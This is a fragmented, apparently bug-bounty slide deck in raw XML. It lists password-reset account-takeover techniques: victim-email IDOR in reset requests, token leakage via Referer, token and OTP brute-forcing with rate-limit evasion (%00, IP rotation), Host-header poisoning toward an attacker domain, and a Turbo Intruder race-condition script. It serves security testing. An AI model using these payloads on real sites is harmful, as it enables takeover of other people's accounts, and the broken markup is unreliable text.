              <a:t>0000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old-pass=**********&amp;new-pass=*********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78" name="Google Shape;778;p8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9" name="Google Shape;779;p8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8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81" name="Google Shape;78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8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83" name="Google Shape;78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8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85" name="Google Shape;785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8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87" name="Google Shape;787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IDOR Technique By Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email Address Of Victim e.g. victim@gmail.com With Your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Token </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get ATO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93" name="Google Shape;793;p8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/resetPassword/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change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victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;token=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your-Token</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;old-pass=**********&amp;new-pass=*********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94" name="Google Shape;794;p8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95" name="Google Shape;795;p8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8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97" name="Google Shape;79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8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99" name="Google Shape;799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762" y="2455550"/>
            <a:ext cx="1323825" cy="6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8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01" name="Google Shape;801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82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03" name="Google Shape;803;p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433745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82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05" name="Google Shape;805;p8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3939538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8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07" name="Google Shape;807;p8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Isn't Email Parameter , Try To Append Email Parameter With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Victim Email </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. email=victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get ATO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13" name="Google Shape;813;p8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/resetPassword/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change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email=victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;token=token&amp;old-pass=**********&amp;new-pass=*********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814" name="Google Shape;814;p8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15" name="Google Shape;815;p8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8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17" name="Google Shape;81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8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19" name="Google Shape;819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8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21" name="Google Shape;821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8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Check </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If The Reset Token Leaked Via Referrer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Not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27" name="Google Shape;827;p8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/getInfo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www.third-party.com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Referer: https://company.com/resetpass?token=Random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28" name="Google Shape;828;p8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9" name="Google Shape;829;p8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8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31" name="Google Shape;83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8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33" name="Google Shape;833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8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35" name="Google Shape;835;p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8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37" name="Google Shape;837;p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84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39" name="Google Shape;839;p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2925" y="39463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Brute Force The Token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After Figure Out How The Token Generated based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e.g. Timestamp , UserID , Email AND Weak Cryptography </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get ATO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45" name="Google Shape;845;p8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/resetPassword/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token=FUZZ</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;old-pass=**********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&amp;new-pass=*********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46" name="Google Shape;846;p8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47" name="Google Shape;847;p8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8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49" name="Google Shape;84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8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51" name="Google Shape;851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8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53" name="Google Shape;853;p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85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55" name="Google Shape;855;p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OTP Code Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> It And If The Company Blocked You ,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Try To Reset Password Again If The OTP Is The Same</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , There Is ATO Here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61" name="Google Shape;861;p8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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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email=victim@gmail.com&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otp=*****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62" name="Google Shape;862;p8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63" name="Google Shape;863;p8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8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65" name="Google Shape;86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8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67" name="Google Shape;867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Append %00 With Your Email </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Every Time You Exhaust Your Rate Limit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Get ATO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73" name="Google Shape;873;p8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/resetPassword/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change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r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;token=Random&amp;old-pass=**********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&amp;new-pass=*********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74" name="Google Shape;874;p8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5" name="Google Shape;875;p8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8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77" name="Google Shape;87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8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79" name="Google Shape;879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OTP Code Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> By Using Multiple IPs Or Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP Rotate Burp Suite Extension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85" name="Google Shape;885;p8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email=victim@gmail.com&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otp=*****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86" name="Google Shape;886;p8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87" name="Google Shape;887;p8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8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89" name="Google Shape;88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8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91" name="Google Shape;891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8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93" name="Google Shape;893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88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95" name="Google Shape;895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Ambiguate The Host Header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Host: company.com:@me.com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Get The Reset Token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61" name="Google Shape;261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Host: company.com:@me.com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62" name="Google Shape;262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3" name="Google Shape;263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7" name="Google Shape;26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Figure Out Reaction Of The Server While Doing Race Condition By Using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Turbo Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR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Nuclei</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Send Simultaneously Requests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01" name="Google Shape;901;p8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POST /resetPassword HTTP/1.1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Host: www.company.com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X-Test: %s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email=victim@gmail.com&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otp=wrongOTP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def queueRequests(target, wordlists):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engine = RequestEngine(endpoint=target.endpoint,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                       concurrentConnections=30,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                       requestsPerConnection=100,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                       pipeline=False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                       )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for i in range(30):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    engine.queue(target.req, target.baseInput, gate='race1')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engine.openGate('race1')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engine.complete(timeout=60)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def handleResponse(req, interesting):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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    table.add(req)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="902" name="Google Shape;902;p8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3" name="Google Shape;903;p8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05" name="Google Shape;905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700" y="2621200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8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08" name="Google Shape;908;p8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09" name="Google Shape;909;p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200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Request Of Reset Password To I</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntruder</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Put Payloads e.g. me+1@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me+2@gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="12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Threads To 20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And Try To See What Bits Are Different In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15" name="Google Shape;915;p9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me+1@gmail.com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16" name="Google Shape;916;p9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7" name="Google Shape;917;p9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9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19" name="Google Shape;91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9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21" name="Google Shape;921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9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23" name="Google Shape;923;p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OTP Code Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host Header</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Another Host That Miss The Rate Limited OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUZZ All The IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Similar</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Endpoint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29" name="Google Shape;929;p9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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUZZ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email=victim@gmail.com&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otp=*****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30" name="Google Shape;930;p9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1" name="Google Shape;931;p9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9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33" name="Google Shape;93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9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35" name="Google Shape;935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9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37" name="Google Shape;937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9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39" name="Google Shape;939;p9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5" name="Google Shape;945;p9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9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47" name="Google Shape;947;p9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Search About The Reset Token</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Burp History 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948" name="Google Shape;94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9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Set Up Burp In Browser One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Reset Password In Browser One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Open The Password Reset Email In Browser Two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Copy The Token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5 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Search Your Burp History For The Token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50" name="Google Shape;950;p9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51" name="Google Shape;951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9663" y="-358675"/>
            <a:ext cx="9763326" cy="5387424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93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-71725" y="4711825"/>
            <a:ext cx="9279600" cy="462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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gaurav Popalghat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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip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58" name="Google Shape;958;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4711813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59" name="Google Shape;959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925" y="4760737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94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94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6" name="Google Shape;966;p94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67" name="Google Shape;967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94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94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94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Ambiguate The Host Header e.g. Host: company.com: me.com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Get The Reset Token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73" name="Google Shape;273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Host: company.com: me.com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5" name="Google Shape;275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9" name="Google Shape;27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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Routing Of The Request e.g. POST @me.com/resetPassword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POST :@me.com/resetPassword </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To 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85" name="Google Shape;285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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.com/resetPassword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7" name="Google Shape;287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 Routing Of The Request e.g. POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resetPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@me.com#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POST @me.com/resetPassword </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To 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97" name="Google Shape;297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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resetPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@me.com#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9" name="Google Shape;299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 Routing Of The Request e.g. POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resetPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@me.com#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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resetPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:@me.com# </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get The Reset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11" name="Google Shape;311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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resetPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@me.com#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200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HTTP/1.0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3" name="Google Shape;313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